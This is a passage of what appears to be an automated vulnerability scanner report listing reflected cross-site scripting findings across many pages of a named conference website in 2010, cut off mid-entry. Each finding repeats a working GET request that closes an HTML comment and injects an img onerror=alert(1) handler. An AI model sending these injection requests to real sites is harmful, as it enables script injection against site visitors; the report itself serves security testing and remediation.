Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /about/what-is-cloud-computing.php/a25a6--><img%20src%3da%20onerror%3dalert(1)>3c8bf8590b1 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:41 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 29080
3.176. http://www.cloudconnectevent.com/cloud-computing-conference/advisory-board.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cloudconnectevent.com
Path: /cloud-computing-conference/advisory-board.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 68fbc--><img%20src%3da%20onerror%3dalert(1)>afc4296ab7c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 68fbc--><img src=a onerror=alert(1)>afc4296ab7c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/advisory-board.php/68fbc--><img%20src%3da%20onerror%3dalert(1)>afc4296ab7c HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:30:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 30239
3.177. http://www.cloudconnectevent.com/cloud-computing-conference/cloud-economics.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cloudconnectevent.com
Path: /cloud-computing-conference/cloud-economics.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload ab747--><img%20src%3da%20onerror%3dalert(1)>8a559ab01f2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as ab747--><img src=a onerror=alert(1)>8a559ab01f2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/cloud-economics.php/ab747--><img%20src%3da%20onerror%3dalert(1)>8a559ab01f2 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:27:55 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 41563
3.178. http://www.cloudconnectevent.com/cloud-computing-conference/cloud-industry-summit.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1f1f6--><img%20src%3da%20onerror%3dalert(1)>ee3d39cc0c9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1f1f6--><img src=a onerror=alert(1)>ee3d39cc0c9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/cloud-industry-summit.php/1f1f6--><img%20src%3da%20onerror%3dalert(1)>ee3d39cc0c9 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:28:01 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 54087
3.179. http://www.cloudconnectevent.com/cloud-computing-conference/cloudsec.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cloudconnectevent.com
Path: /cloud-computing-conference/cloudsec.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e24c--><img%20src%3da%20onerror%3dalert(1)>f2794f21a97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e24c--><img src=a onerror=alert(1)>f2794f21a97 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/cloudsec.php/5e24c--><img%20src%3da%20onerror%3dalert(1)>f2794f21a97 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:28:25 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 49961
3.180. http://www.cloudconnectevent.com/cloud-computing-conference/culture-politics-and-governance.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 90191--><img%20src%3da%20onerror%3dalert(1)>cbf54a66f2e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 90191--><img src=a onerror=alert(1)>cbf54a66f2e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/culture-politics-and-governance.php/90191--><img%20src%3da%20onerror%3dalert(1)>cbf54a66f2e HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:28:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 39247
3.181. http://www.cloudconnectevent.com/cloud-computing-conference/data-and-storage.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/data-and-storage.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 8f497--><img%20src%3da%20onerror%3dalert(1)>75427e9dd5a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8f497--><img src=a onerror=alert(1)>75427e9dd5a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/data-and-storage.php/8f497--><img%20src%3da%20onerror%3dalert(1)>75427e9dd5a HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:28:47 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 37131
3.182. http://www.cloudconnectevent.com/cloud-computing-conference/design-patterns.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/design-patterns.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 29898--><img%20src%3da%20onerror%3dalert(1)>645fd227004 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 29898--><img src=a onerror=alert(1)>645fd227004 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/design-patterns.php/29898--><img%20src%3da%20onerror%3dalert(1)>645fd227004 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:28:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 40160
3.183. http://www.cloudconnectevent.com/cloud-computing-conference/devops-and-automation.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 62edf--><img%20src%3da%20onerror%3dalert(1)>9961a7af16d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 62edf--><img src=a onerror=alert(1)>9961a7af16d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/devops-and-automation.php/62edf--><img%20src%3da%20onerror%3dalert(1)>9961a7af16d HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:29:08 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 33499
3.184. http://www.cloudconnectevent.com/cloud-computing-conference/event-schedule.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/event-schedule.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a886b--><img%20src%3da%20onerror%3dalert(1)>2a78e25b19c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a886b--><img src=a onerror=alert(1)>2a78e25b19c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/event-schedule.php/a886b--><img%20src%3da%20onerror%3dalert(1)>2a78e25b19c HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:30:13 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 129041
3.185. http://www.cloudconnectevent.com/cloud-computing-conference/performance-and-monitoring.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1a808--><img%20src%3da%20onerror%3dalert(1)>887d62253e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a808--><img src=a onerror=alert(1)>887d62253e9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/performance-and-monitoring.php/1a808--><img%20src%3da%20onerror%3dalert(1)>887d62253e9 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:29:17 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 35471
3.186. http://www.cloudconnectevent.com/cloud-computing-conference/private-clouds.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/private-clouds.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a4e50--><img%20src%3da%20onerror%3dalert(1)>419370da55c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a4e50--><img src=a onerror=alert(1)>419370da55c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/private-clouds.php/a4e50--><img%20src%3da%20onerror%3dalert(1)>419370da55c HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:29:21 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 36784
3.187. http://www.cloudconnectevent.com/cloud-computing-conference/the-future-of-utility-computing.php [name of an arbitrarily supplied request parameter]
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload dd54a--><img%20src%3da%20onerror%3dalert(1)>14457f7e7ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as dd54a--><img src=a onerror=alert(1)>14457f7e7ee in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/the-future-of-utility-computing.php/dd54a--><img%20src%3da%20onerror%3dalert(1)>14457f7e7ee HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:29:11 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 33904
3.188. http://www.cloudconnectevent.com/cloud-computing-conference/track-chairs.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/track-chairs.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 26edf--><img%20src%3da%20onerror%3dalert(1)>199746e5806 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 26edf--><img src=a onerror=alert(1)>199746e5806 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/track-chairs.php/26edf--><img%20src%3da%20onerror%3dalert(1)>199746e5806 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:29:52 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 47411
3.189. http://www.cloudconnectevent.com/cloud-computing-conference/workshops.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/cloud-computing-conference/workshops.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 46343--><img%20src%3da%20onerror%3dalert(1)>23b7df10469 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 46343--><img src=a onerror=alert(1)>23b7df10469 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /cloud-computing-conference/workshops.php/46343--><img%20src%3da%20onerror%3dalert(1)>23b7df10469 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:30:01 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 46826
3.190. http://www.cloudconnectevent.com/contact-us.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/contact-us.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 197e2--><img%20src%3da%20onerror%3dalert(1)>7ce8abd1501 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 197e2--><img src=a onerror=alert(1)>7ce8abd1501 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /contact-us.php/197e2--><img%20src%3da%20onerror%3dalert(1)>7ce8abd1501 HTTP/1.1
Host: www.cloudconnectevent.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK
Date: Sun, 12 Dec 2010 00:32:02 GMT
Server: Apache
X-Powered-By: PHP/5.1.6
Connection: close
Content-Type: text/html
Content-Length: 33513
3.191. http://www.cloudconnectevent.com/expo/event-testimonials.php [name of an arbitrarily supplied request parameter]
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.cloudconnectevent.com
Path:
/expo/event-testimonials.php
Issue detail
